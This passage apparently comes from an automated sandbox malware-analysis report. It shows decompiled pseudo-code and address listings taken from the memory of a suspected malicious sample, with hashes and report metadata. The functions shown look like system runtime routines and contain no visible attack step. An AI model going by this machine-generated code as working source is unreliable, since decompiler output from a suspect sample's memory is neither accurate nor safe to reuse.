					while(1) {
						 *(_t198 - 0x20) = _t194;
						_t207 = _t194 -  *0x33444f44; // 0x4
						if(_t207 >= 0) {
							break;
						}
						_t176 = _t194 << 5;
						 *(_t198 - 0x2c) = _t176;
						_t166 = _t176 +  *0x33444f40;
						if(_t166[2] ==  *(_t198 - 0x24)) {
							__eflags = _t163 & 0x00000002;
							if((_t163 & 0x00000002) != 0) {
								__eflags = _t166[4] - _t191;
								if(_t166[4] != _t191) {
									L21:
									 *((intOrPtr*)(_t198 - 4)) = 0xfffffffe;
									E33359610();
									_t112 = 1;
									goto L22;
								} else {
									goto L27;
								}
							}
							L27:
							__eflags =  *(_t198 - 0x28);
							if( *(_t198 - 0x28) == 0) {
								goto L8;
							}
							__eflags = _t166[8];
							if(_t166[8] == 0) {
								goto L8;
							}
							_t152 =  *((intOrPtr*)(_t198 + 0x10));
							__eflags = _t152;
							if(_t152 == 0) {
								goto L8;
							}
							__eflags =  *_t166 - _t152;
							if( *_t166 != _t152) {
								goto L8;
							}
							_t154 =  *( *(_t198 - 0x1c));
							__eflags = _t154 - 0xffffffff;
							if(_t154 == 0xffffffff) {
								L57:
								_t188 =  *0x33444f40; // 0x2fefdc8
								_t197 =  *(_t198 - 0x2c);
								 *( *(_t198 - 0x1c)) =  *(_t197 + _t188 + 0x10);
								_t178 =  *(_t198 + 8);
								__eflags = _t178;
								if(_t178 != 0) {
									 *_t178 =  *((intOrPtr*)(_t197 + _t188 + 0x14));
								}
								goto L21;
							} else {
								__eflags = _t163 & 0x00000020;
								if((_t163 & 0x00000020) == 0) {
									_push(_t154 & 0xfffffffc);
									_push(0xffffffff);
									E33392C50();
									_t179 =  *(_t198 + 8);
									__eflags = _t179;
									if(_t179 != 0) {
										_push( *_t179);
										E33392A80();
									}
									goto L57;
								}
								__eflags = _t166[8] - 0xffffffff;
								if(_t166[8] == 0xffffffff) {
									_t166[8] = _t191;
								}
								break;
							}
							L32:
							__eflags = _t163 & 0x00000002;
							if((_t163 & 0x00000002) != 0) {
								__eflags = _t166[4] - _t191;
								if(_t166[4] != _t191) {
									goto L33;
								}
								_t166[4] =  *(_t198 + 0xc);
								_t166[0xe] =  *(_t198 + 0x18);
								goto L21;
							}
							L33:
							__eflags = _t163 & 0x00000001;
							if((_t163 & 0x00000001) == 0) {
								L15:
								_t195 = _t195 + 1;
								while(1) {
									L13:
									 *(_t198 - 0x20) = _t195;
									__eflags = _t195 -  *0x33444f44; // 0x4
									if(__eflags >= 0) {
										_t121 = E3335B920(_t166, _t181 & 0xfffffffc);
										__eflags = _t121;
										if(_t121 != 0) {
											 *((short*)(_t184 + _t169)) =  *((intOrPtr*)(_t198 + 0x10));
											 *(_t184 + _t169 + 0xc) =  *(_t198 - 0x2c);
											 *(_t184 + _t169 + 0x1c) =  *(_t198 + 0x18);
											__eflags =  *0x33444f50;
											if( *0x33444f50 != 0) {
												__eflags = _t164;
												if(_t164 != 0) {
													_t196 = _t195 << 5;
													_t132 = E333DFB45(_t169 + _t196, 1);
													__eflags = _t132;
													if(_t132 >= 0) {
														__eflags =  *0x33444f50 & 0x00000002;
														if(( *0x33444f50 & 0x00000002) != 0) {
															_t133 =  *0x33444f40; // 0x2fefdc8
															__eflags =  *((intOrPtr*)(_t196 + _t133 + 0x1c)) - 0xc0000019;
															if( *((intOrPtr*)(_t196 + _t133 + 0x1c)) == 0xc0000019) {
																 *( *(_t198 - 0x1c)) =  *(_t196 + _t133 + 0x10);
															}
														}
													}
												}
											}
											 *0x33444f44 =  *0x33444f44 + 1;
											__eflags =  *0x33444f44;
										}
										goto L21;
									}
									_t173 = _t195 << 5;
									 *(_t198 - 0x2c) = _t173;
									_t166 = _t173 +  *0x33444f40;
									__eflags = _t166[2] - _t181;
									if(_t166[2] == _t181) {
										goto L32;
									}
									goto L15;
								}
								goto L21;
							}
							__eflags = _t166[8] - _t191;
							if(_t166[8] != _t191) {
								goto L15;
							}
							_t135 =  *_t166 & 0x0000ffff;
							__eflags = _t135 -  *((intOrPtr*)(_t198 + 0x10));
							if(_t135 ==  *((intOrPtr*)(_t198 + 0x10))) {
								L37:
								_t165 =  *(_t198 - 0x1c);
								_t166[8] =  *_t165;
								_t137 =  *(_t198 + 8);
								__eflags = _t137;
								if(_t137 != 0) {
									_t191 =  *_t137;
								}
								_t166[0xa] = _t191;
								 *_t166 =  *((intOrPtr*)(_t198 + 0x10));
								_t166[0xe] =  *(_t198 + 0x18);
								_t166[0xc] =  *(_t198 + 0x1c);
								__eflags =  *0x33444f50;
								if( *0x33444f50 != 0) {
									_t141 = E333DFB45(_t166, 1);
									__eflags = _t141;
									if(_t141 >= 0) {
										__eflags =  *0x33444f50 & 0x00000002;
										if(( *0x33444f50 & 0x00000002) != 0) {
											_t174 =  *0x33444f40; // 0x2fefdc8
											_t142 =  *(_t198 - 0x2c);
											__eflags =  *((intOrPtr*)(_t142 + _t174 + 0x1c)) - 0xc0000019;
											if( *((intOrPtr*)(_t142 + _t174 + 0x1c)) == 0xc0000019) {
												 *_t165 =  *(_t142 + _t174 + 0x10);
											}
										}
									}
								}
								goto L21;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								goto L15;
							}
							goto L37;
						} else {
							if((_t163 & 0x00000010) != 0) {
								__eflags =  *0x33444f50;
								if( *0x33444f50 != 0) {
									__eflags = _t166[0xa];
									if(_t166[0xa] != 0) {
										__eflags = _t166[0xa] - 0xffffffff;
										if(_t166[0xa] != 0xffffffff) {
											E333DFB45(_t166, 0);
										}
									}
								}
							}
							L8:
							_t194 = _t194 + 1;
							continue;
						}
					}
					__eflags = _t163 & 0x00000010;
					if((_t163 & 0x00000010) != 0) {
						goto L21;
					}
					__eflags =  *0x33444f40;
					if( *0x33444f40 == 0) {
						_t120 = L33365D90(_t166,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x400);
						__eflags = _t120;
						if(_t120 == 0) {
							goto L21;
						} else {
							 *0x33444f40 = _t120;
							 *0x33444f48 = 0x20;
							L12:
							_t195 = _t191;
							_t181 =  *(_t198 - 0x24);
							goto L13;
						}
					}
					_t146 =  *0x33444f48; // 0x20
					__eflags =  *0x33444f44 - _t146; // 0x4
					if(__eflags >= 0) {
						_t150 = E33362710( *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *0x33444f40, _t146 + 0x20 << 5);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L21;
						}
						 *0x33444f40 = _t150;
						 *0x33444f48 =  *0x33444f48 + 0x20;
					}
					goto L12;
				}
			}




































                                                                                                                                                                                  0x333593a6
                                                                                                                                                                                  0x333593a6
                                                                                                                                                                                  0x333593a8
                                                                                                                                                                                  0x333593ad
                                                                                                                                                                                  0x333593b2
                                                                                                                                                                                  0x333593b7
                                                                                                                                                                                  0x333593bc
                                                                                                                                                                                  0x3335950d
                                                                                                                                                                                  0x3335950d
                                                                                                                                                                                  0x333594fb
                                                                                                                                                                                  0x333594fe
                                                                                                                                                                                  0x3335950a
                                                                                                                                                                                  0x3335950a
                                                                                                                                                                                  0x333593c2
                                                                                                                                                                                  0x333593cb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333593de
                                                                                                                                                                                  0x333593e0
                                                                                                                                                                                  0x333593e3
                                                                                                                                                                                  0x333593e6
                                                                                                                                                                                  0x33359511
                                                                                                                                                                                  0x33359513
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359519
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359519
                                                                                                                                                                                  0x33359513
                                                                                                                                                                                  0x333593ec
                                                                                                                                                                                  0x333593f1
                                                                                                                                                                                  0x333593f6
                                                                                                                                                                                  0x333593f8
                                                                                                                                                                                  0x333593fb
                                                                                                                                                                                  0x333593fd
                                                                                                                                                                                  0x333593fd
                                                                                                                                                                                  0x33359400
                                                                                                                                                                                  0x33359406
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335940a
                                                                                                                                                                                  0x3335940d
                                                                                                                                                                                  0x33359410
                                                                                                                                                                                  0x3335941c
                                                                                                                                                                                  0x3335951b
                                                                                                                                                                                  0x3335951e
                                                                                                                                                                                  0x333b251c
                                                                                                                                                                                  0x333b251f
                                                                                                                                                                                  0x333594ed
                                                                                                                                                                                  0x333594ed
                                                                                                                                                                                  0x333594f4
                                                                                                                                                                                  0x333594f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2525
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2525
                                                                                                                                                                                  0x333b251f
                                                                                                                                                                                  0x33359524
                                                                                                                                                                                  0x33359524
                                                                                                                                                                                  0x33359528
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335952e
                                                                                                                                                                                  0x33359532
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359538
                                                                                                                                                                                  0x3335953c
                                                                                                                                                                                  0x3335953f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359545
                                                                                                                                                                                  0x33359548
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b252d
                                                                                                                                                                                  0x333b252f
                                                                                                                                                                                  0x333b2532
                                                                                                                                                                                  0x333b2564
                                                                                                                                                                                  0x333b2564
                                                                                                                                                                                  0x333b256a
                                                                                                                                                                                  0x333b2574
                                                                                                                                                                                  0x333b2576
                                                                                                                                                                                  0x333b2579
                                                                                                                                                                                  0x333b257b
                                                                                                                                                                                  0x333b2585
                                                                                                                                                                                  0x333b2585
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2534
                                                                                                                                                                                  0x333b2534
                                                                                                                                                                                  0x333b2537
                                                                                                                                                                                  0x333b254e
                                                                                                                                                                                  0x333b254f
                                                                                                                                                                                  0x333b2551
                                                                                                                                                                                  0x333b2556
                                                                                                                                                                                  0x333b2559
                                                                                                                                                                                  0x333b255b
                                                                                                                                                                                  0x333b255d
                                                                                                                                                                                  0x333b255f
                                                                                                                                                                                  0x333b255f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b255b
                                                                                                                                                                                  0x333b2539
                                                                                                                                                                                  0x333b253d
                                                                                                                                                                                  0x333b2543
                                                                                                                                                                                  0x333b2543
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b253d
                                                                                                                                                                                  0x33359553
                                                                                                                                                                                  0x33359553
                                                                                                                                                                                  0x33359556
                                                                                                                                                                                  0x333b25ef
                                                                                                                                                                                  0x333b25f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b25fb
                                                                                                                                                                                  0x333b2601
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2601
                                                                                                                                                                                  0x3335955c
                                                                                                                                                                                  0x3335955c
                                                                                                                                                                                  0x3335955f
                                                                                                                                                                                  0x3335947c
                                                                                                                                                                                  0x3335947c
                                                                                                                                                                                  0x3335945a
                                                                                                                                                                                  0x3335945a
                                                                                                                                                                                  0x3335945a
                                                                                                                                                                                  0x3335945d
                                                                                                                                                                                  0x33359463
                                                                                                                                                                                  0x33359483
                                                                                                                                                                                  0x33359488
                                                                                                                                                                                  0x3335948a
                                                                                                                                                                                  0x333594c8
                                                                                                                                                                                  0x333594cf
                                                                                                                                                                                  0x333594d6
                                                                                                                                                                                  0x333594da
                                                                                                                                                                                  0x333594e1
                                                                                                                                                                                  0x333b2647
                                                                                                                                                                                  0x333b2649
                                                                                                                                                                                  0x333b264f
                                                                                                                                                                                  0x333b2656
                                                                                                                                                                                  0x333b265b
                                                                                                                                                                                  0x333b265d
                                                                                                                                                                                  0x333b2663
                                                                                                                                                                                  0x333b266a
                                                                                                                                                                                  0x333b2670
                                                                                                                                                                                  0x333b2675
                                                                                                                                                                                  0x333b267d
                                                                                                                                                                                  0x333b268a
                                                                                                                                                                                  0x333b268a
                                                                                                                                                                                  0x333b267d
                                                                                                                                                                                  0x333b266a
                                                                                                                                                                                  0x333b265d
                                                                                                                                                                                  0x333b2649
                                                                                                                                                                                  0x333594e7
                                                                                                                                                                                  0x333594e7
                                                                                                                                                                                  0x333594e7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335948a
                                                                                                                                                                                  0x33359467
                                                                                                                                                                                  0x3335946a
                                                                                                                                                                                  0x3335946d
                                                                                                                                                                                  0x33359473
                                                                                                                                                                                  0x33359476
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359476
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335945a
                                                                                                                                                                                  0x33359565
                                                                                                                                                                                  0x33359568
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335956e
                                                                                                                                                                                  0x33359571
                                                                                                                                                                                  0x33359575
                                                                                                                                                                                  0x33359580
                                                                                                                                                                                  0x33359580
                                                                                                                                                                                  0x33359585
                                                                                                                                                                                  0x33359588
                                                                                                                                                                                  0x3335958b
                                                                                                                                                                                  0x3335958d
                                                                                                                                                                                  0x3335958f
                                                                                                                                                                                  0x3335958f
                                                                                                                                                                                  0x33359591
                                                                                                                                                                                  0x33359598
                                                                                                                                                                                  0x3335959e
                                                                                                                                                                                  0x333595a4
                                                                                                                                                                                  0x333595a7
                                                                                                                                                                                  0x333595ae
                                                                                                                                                                                  0x333b260b
                                                                                                                                                                                  0x333b2610
                                                                                                                                                                                  0x333b2612
                                                                                                                                                                                  0x333b2618
                                                                                                                                                                                  0x333b261f
                                                                                                                                                                                  0x333b2625
                                                                                                                                                                                  0x333b262b
                                                                                                                                                                                  0x333b262e
                                                                                                                                                                                  0x333b2636
                                                                                                                                                                                  0x333b2640
                                                                                                                                                                                  0x333b2640
                                                                                                                                                                                  0x333b2636
                                                                                                                                                                                  0x333b261f
                                                                                                                                                                                  0x333b2612
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333595ae
                                                                                                                                                                                  0x33359577
                                                                                                                                                                                  0x3335957a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359422
                                                                                                                                                                                  0x33359425
                                                                                                                                                                                  0x333b258c
                                                                                                                                                                                  0x333b2593
                                                                                                                                                                                  0x333b2599
                                                                                                                                                                                  0x333b259d
                                                                                                                                                                                  0x333b25a3
                                                                                                                                                                                  0x333b25a7
                                                                                                                                                                                  0x333b25af
                                                                                                                                                                                  0x333b25af
                                                                                                                                                                                  0x333b25a7
                                                                                                                                                                                  0x333b259d
                                                                                                                                                                                  0x333b2593
                                                                                                                                                                                  0x3335942b
                                                                                                                                                                                  0x3335942b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335942b
                                                                                                                                                                                  0x3335941c
                                                                                                                                                                                  0x3335942e
                                                                                                                                                                                  0x33359431
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359437
                                                                                                                                                                                  0x3335943e
                                                                                                                                                                                  0x333595c9
                                                                                                                                                                                  0x333595ce
                                                                                                                                                                                  0x333595d0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333595d6
                                                                                                                                                                                  0x333595d6
                                                                                                                                                                                  0x333595db
                                                                                                                                                                                  0x33359455
                                                                                                                                                                                  0x33359455
                                                                                                                                                                                  0x33359457
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359457
                                                                                                                                                                                  0x333595d0
                                                                                                                                                                                  0x33359444
                                                                                                                                                                                  0x33359449
                                                                                                                                                                                  0x3335944f
                                                                                                                                                                                  0x333b25d1
                                                                                                                                                                                  0x333b25d6
                                                                                                                                                                                  0x333b25d8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b25de
                                                                                                                                                                                  0x333b25e3
                                                                                                                                                                                  0x333b25e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335944f

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4cc046a7ad83d9a17ad8f692a4df00addfa53c4af2d5d22d88857bbbbdeae391
                                                                                                                                                                                  • Instruction ID: ee2189454076220638dce4b79ffa5004589fa0afb5860f67f45658c0b4db8773
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cc046a7ad83d9a17ad8f692a4df00addfa53c4af2d5d22d88857bbbbdeae391
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EB150B8940305CFEB14DF18D880BA9B7F4BB48355F54C56AEC61AB392DB35D882CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33357290 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                  			E33357290(intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v0;
				signed int _v8;
				char _v12;
				signed char _v16;
				signed char _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				void* _v80;
				signed int _v92;
				intOrPtr _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t192;
				signed int _t194;
				char* _t198;
				signed int _t200;
				signed int _t202;
				signed int _t204;
				char* _t207;
				signed int _t214;
				char* _t217;
				void* _t221;
				signed int _t224;
				signed int* _t225;
				signed int _t226;
				signed int _t227;
				signed int* _t229;
				signed int _t230;
				char* _t233;
				intOrPtr _t235;
				char _t238;
				intOrPtr _t239;
				signed char _t242;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t253;
				void* _t260;
				void* _t263;
				signed int* _t264;
				signed int _t265;
				signed int _t267;
				intOrPtr* _t268;
				signed int _t270;
				signed int _t271;
				intOrPtr _t274;
				intOrPtr _t275;
				signed int _t278;
				intOrPtr _t279;
				void* _t280;
				intOrPtr _t281;
				intOrPtr _t283;
				signed int _t285;
				signed int _t292;
				intOrPtr* _t299;
				signed int* _t300;
				intOrPtr _t301;
				intOrPtr _t311;
				intOrPtr _t317;
				signed int _t318;
				signed int* _t326;
				signed int _t327;
				intOrPtr _t328;
				intOrPtr _t333;
				signed int _t334;
				signed int _t342;
				signed int _t343;
				char _t345;
				intOrPtr _t347;
				signed int _t348;
				signed int _t350;
				intOrPtr* _t354;
				signed int _t360;
				signed int _t361;
				intOrPtr* _t362;
				void* _t363;
				signed int _t364;
				intOrPtr _t369;
				intOrPtr _t370;
				intOrPtr _t371;
				signed int _t372;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int* _t380;
				void* _t381;
				signed int* _t382;
				intOrPtr _t385;
				intOrPtr _t390;
				signed int _t392;
				signed int _t396;
				signed int _t398;
				void* _t414;

				_t392 = _t396;
				_t398 = (_t396 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3344b370 ^ _t398;
				_t287 = 0;
				_v48 = _a4;
				_v56 = _a12;
				_v28 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(_a16 + 4)) != 0) {
					_v60 = 1;
					while(1) {
						_t278 =  *0x7ffe0018;
						_v72 =  *0x7FFE0014;
						__eflags = _t278 -  *0x7FFE001C;
						if(_t278 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_push(8);
				} else {
					_v60 = 0;
					_t354 = 0x7ffe03b0;
					goto L2;
					do {
						do {
							L2:
							_t270 =  *0x334467f0; // 0x0
							_v76 = _t270;
							_t271 =  *0x334467f4; // 0x0
							_v40 = _t271;
							_v44 =  *((intOrPtr*)(_t354 + 4));
							_v72 =  *_t354;
							while(1) {
								_t278 =  *0x7FFE000C;
								_t328 =  *0x7FFE0008;
								if(_t278 ==  *0x7ffe0010) {
									goto L4;
								}
								asm("pause");
							}
							L4:
							_t376 = _v44;
							_t354 = 0x7ffe03b0;
							_t274 =  *0x7ffe03b0;
							_t390 =  *0x7FFE03B4;
							_v52 = _t274;
						} while (_v72 != _t274 || _t376 != _t390);
						_t275 =  *0x334467f0; // 0x0
						_t377 =  *0x334467f4; // 0x0
					} while (_v76 != _t275 || _v40 != _t377);
					_push(0x50);
					asm("sbb ebx, esi");
					_v72 = _t328 - _v52 - _v76;
					asm("sbb ebx, eax");
					_t287 = 0;
				}
				_t359 = _v56;
				_t333 = _v48;
				_pop(_t192);
				_t380 = _t192 + _v56;
				if(_t333 == 0 ||  *((intOrPtr*)(_t333 + 0x24)) != _t287) {
					E33424A6D(_t278, _t287, _t333, _t359, _t380);
				} else {
					 *((intOrPtr*)(_t333 + 0x24)) = 3;
				}
				_t194 =  &_v68;
				_v64 = _t194;
				_v68 = _t194;
				if(L33363C40() != 0) {
					_t198 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t198 = 0x7ffe0386;
				}
				if( *_t198 != 0) {
					_t198 = E33424FFF(_t380);
				}
				L33362330(_t198, _t359);
				while(1) {
					_t360 = _t380[2];
					_t334 = _t360;
					if(_t360 == 0) {
						break;
					}
					_t414 =  *((intOrPtr*)(_t360 + 0x1c)) - _t278;
					if(_t414 > 0 || _t414 >= 0 &&  *((intOrPtr*)(_t360 + 0x18)) > _v72) {
						break;
					} else {
						L43();
						_t342 = _t360 - 0x18;
						L43();
						 *((char*)(_t360 + 0x2c)) = 0;
						_t225 =  &_v68;
						_t299 = _v64;
						if( *_t299 != _t225) {
							_t300 = 3;
							asm("int 0x29");
							_t226 =  *_t300;
							__eflags = _t342 - _t226;
							if(_t342 != _t226) {
								_t227 =  *_t342;
								__eflags =  *(_t227 + 4) - _t342;
								if( *(_t227 + 4) != _t342) {
									L49:
									_t300 = 3;
									asm("int 0x29");
								} else {
									_push(_t380);
									_t380 =  *(_t342 + 4);
									_push(_t360);
									__eflags =  *_t380 - _t342;
									if( *_t380 != _t342) {
										goto L49;
									} else {
										 *_t380 = _t227;
										 *(_t227 + 4) = _t380;
										_t96 = _t342 + 8; // 0xa0
										_t380 = _t96;
										 *(_t342 + 4) = _t342;
										 *_t342 = _t342;
										_t360 =  *_t380;
										_t267 =  *_t300;
										__eflags =  *(_t360 + 4) - _t380;
										if( *(_t360 + 4) != _t380) {
											goto L49;
										} else {
											 *_t267 = _t360;
											 *(_t267 + 4) = _t380;
											 *(_t360 + 4) = _t267;
											 *_t380 = _t267;
											_t226 = _t342;
											_pop(_t360);
											 *_t300 = _t342;
											_pop(_t380);
											goto L44;
										}
									}
								}
							} else {
								L44:
								 *(_t226 + 0x10) =  *(_t226 + 0x10) & 0x00000000;
								 *(_t226 + 0x14) =  *(_t226 + 0x14) & 0x00000000;
							}
							_push(_t380);
							_t382 = _t300;
							_push(_t360);
							_t364 =  *_t382;
							__eflags = _t364;
							if(_t364 == 0) {
								L53:
								return _t364;
							} else {
								_t101 = _t364 + 8; // 0x8
								_t229 = _t101;
								_t343 =  *_t229;
								__eflags = _t343 - _t229;
								if(_t343 != _t229) {
									__eflags =  *(_t343 + 4) - _t229;
									if( *(_t343 + 4) != _t229) {
										L67:
										_t301 = 3;
										asm("int 0x29");
										_push(_t392);
										_push(_t278);
										_push(_t382);
										_push(_t364);
										_t384 = _t343;
										_t366 = _t301;
										_v132 = _t343;
										_v128 = _t301;
										_t230 = L33363C40();
										__eflags = _t230;
										if(_t230 != 0) {
											_t233 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t233 = 0x7ffe0386;
										}
										__eflags =  *_t233;
										if( *_t233 != 0) {
											__eflags = _v0;
											E33424F7C(((0 | _v0 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + _t384, _t366);
										}
										goto L71;
										do {
											do {
												do {
													do {
														L71:
														_t235 =  *0x334467f0; // 0x0
														_t345 =  *0x334467f4; // 0x0
														_v24 = _t235;
														_v12 = _t345;
														_v20 =  *((intOrPtr*)(0x7ffe03b4));
														_v16 =  *0x7ffe03b0;
														while(1) {
															_t385 =  *0x7ffe000c;
															_t281 =  *((intOrPtr*)(0x7ffe0008));
															__eflags = _t385 -  *0x7FFE0010;
															if(_t385 ==  *0x7FFE0010) {
																goto L73;
															}
															asm("pause");
														}
														L73:
														_t347 = _v12;
														_t369 = _v20;
														_t238 =  *0x7ffe03b0;
														_t311 =  *((intOrPtr*)(0x7ffe03b4));
														_v28 = _t238;
														__eflags = _v16 - _t238;
													} while (_v16 != _t238);
													__eflags = _t369 - _t311;
												} while (_t369 != _t311);
												_t239 =  *0x334467f0; // 0x0
												_t370 =  *0x334467f4; // 0x0
												_v20 = _t370;
												_t371 = _v24;
												__eflags = _t371 - _t239;
											} while (_t371 != _t239);
											__eflags = _t347 - _v20;
										} while (_t347 != _v20);
										asm("sbb esi, ecx");
										_t283 = _t281 - _v28 - _t371;
										_t372 = _v32;
										asm("sbb esi, edx");
										_t136 = _t372 + 0x90; // 0x90
										L33362330(_t136, _t136);
										_t242 =  *((intOrPtr*)(_t372 + 0xde));
										 *((char*)(_t372 + 0xde)) = 0;
										__eflags = _t242 & 0x00000004;
										if((_t242 & 0x00000004) != 0) {
											_t181 = _t372 + 0x90; // 0x90
											 *(_t372 + 0xd8) = 0;
											 *((intOrPtr*)(_t372 + 0xc8)) = 0;
											 *((intOrPtr*)(_t372 + 0xcc)) = 0;
											 *((intOrPtr*)(_t372 + 0xd0)) = 0;
											E333624D0(_t181);
											_t245 = E334249D2( *((intOrPtr*)(_t372 + 0xd0)));
										} else {
											__eflags =  *(_t372 + 0xdd);
											if( *(_t372 + 0xdd) != 0) {
												 *((intOrPtr*)(_t372 + 0xc8)) = 0;
												 *((intOrPtr*)(_t372 + 0xcc)) = 0;
												_t249 = L3338CC67();
												__eflags = _t249;
												if(_t249 != 0) {
													goto L86;
												} else {
													goto L87;
												}
												L89:
												return _t246;
												goto L106;
											} else {
												_t348 =  *(_t372 + 0xd8);
												__eflags = _t348;
												if(_t348 != 0) {
													__eflags = _v0;
													if(_v0 != 0) {
														_t317 = _t283;
														_v12 = _t385;
													} else {
														_t317 =  *((intOrPtr*)(_t372 + 0xc8));
														_v12 =  *((intOrPtr*)(_t372 + 0xcc));
													}
													_t252 = _t348;
													_t350 = _t252 * 0x2710 >> 0x20;
													_t253 = _t252 * 0x2710;
													_t318 = _t317 + _t253;
													_v16 = _t253;
													_t254 = _v12;
													asm("adc eax, edx");
													_v28 = 0x2710;
													_v32 = _t318;
													_v12 = _t254;
													 *((intOrPtr*)(_t372 + 0xc8)) = _t318;
													 *((intOrPtr*)(_t372 + 0xcc)) = _t254;
													__eflags = _t254 - _t385;
													if(__eflags <= 0) {
														if(__eflags < 0) {
															L90:
															asm("sbb eax, [ebp-0x4]");
															_t260 = E33396540(_t283 - _v32, _t385, _v16, _t350);
															_t254 = _v28;
															asm("sbb eax, edx");
															 *((intOrPtr*)(_t372 + 0xc8)) = _v16 - _t260 + _t283;
															asm("adc eax, esi");
															 *((intOrPtr*)(_t372 + 0xcc)) = _v28;
														} else {
															__eflags = _t318 - _t283;
															if(_t318 <= _t283) {
																goto L90;
															}
														}
													}
													asm("lock inc dword [edi]");
													_t285 = _v36;
													L33362330(_t254, _t285);
													_t159 = _t285 + 0x50; // 0x50
													E333579D1(_t159, _t372);
													__eflags = 0;
													_t160 = _t285 + 0x50; // 0x50
													E333577F9(_t160, 0);
													E333624D0(_t285);
												}
												L86:
												E33361BE7(_t372);
											}
											L87:
											_t161 = _t372 + 0x90; // 0x90
											_t245 = E333624D0(_t161);
										}
										_t246 = _t245 | 0xffffffff;
										__eflags = _t246;
										asm("lock xadd [edi], eax");
										if(_t246 == 0) {
											 *0x334491e0(_t372);
											_t246 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t372 + 4))))))();
										}
										goto L89;
									} else {
										_t326 = _t229[1];
										__eflags =  *_t326 - _t229;
										if( *_t326 != _t229) {
											goto L67;
										} else {
											 *_t326 = _t343;
											 *(_t343 + 4) = _t326;
											_t229[1] = _t229;
											 *_t229 = _t229;
											_push(_t278);
											while(1) {
												_t327 =  *_t343;
												__eflags = _t327 - _t343;
												if(_t327 == _t343) {
													break;
												}
												__eflags =  *((intOrPtr*)(_t327 + 0x14)) -  *((intOrPtr*)(_t343 + 0x14));
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L61:
														_t265 = _t327;
														_t327 = _t343;
														_t343 = _t265;
													} else {
														__eflags =  *((intOrPtr*)(_t327 + 0x10)) -  *((intOrPtr*)(_t343 + 0x10));
														if( *((intOrPtr*)(_t327 + 0x10)) <  *((intOrPtr*)(_t343 + 0x10))) {
															goto L61;
														}
													}
												}
												_t263 =  *_t327;
